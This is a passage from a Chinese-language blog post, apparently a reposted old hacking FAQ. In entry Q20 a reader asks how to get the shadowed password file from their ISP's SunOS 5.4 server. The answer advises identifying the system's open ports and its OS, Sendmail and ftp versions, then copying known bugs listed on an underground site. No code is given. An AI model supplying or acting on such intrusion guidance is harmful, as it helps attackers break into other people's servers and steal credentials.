裡呀?? 快點現身吧!! 如果大家有找到新的類似站台的話, 寄得趕快寫信來告訴我呦~

[Q20]
請問我ISP的OS是SunOS5.4,我用貴站上的方法不好用了,用貴站關於shadow的link上提
到的也不成了,要如何取得其shadow過的passwd呢?請賜教,多謝!
[A20]
喔~~ 對了! 剛才忘了講, 如果各位已經試過幾個 Port, 解自己系統的版本編號, 使用
的 Sendmail 版本, ftp 版本等的話, 你們可以到 http://underground.org 去看看, 點
選左邊那個 Bugs, 然後選一下你所知道的系統, 他會列出一些目前所知的 Bugs 出來, 然
候你就可以依樣畫葫蘆啦, 不過那些訊息都是英文的啦~~

arrow
arrow
    全站熱搜

    Neo Chao 發表在 痞客邦 留言(3) 人氣()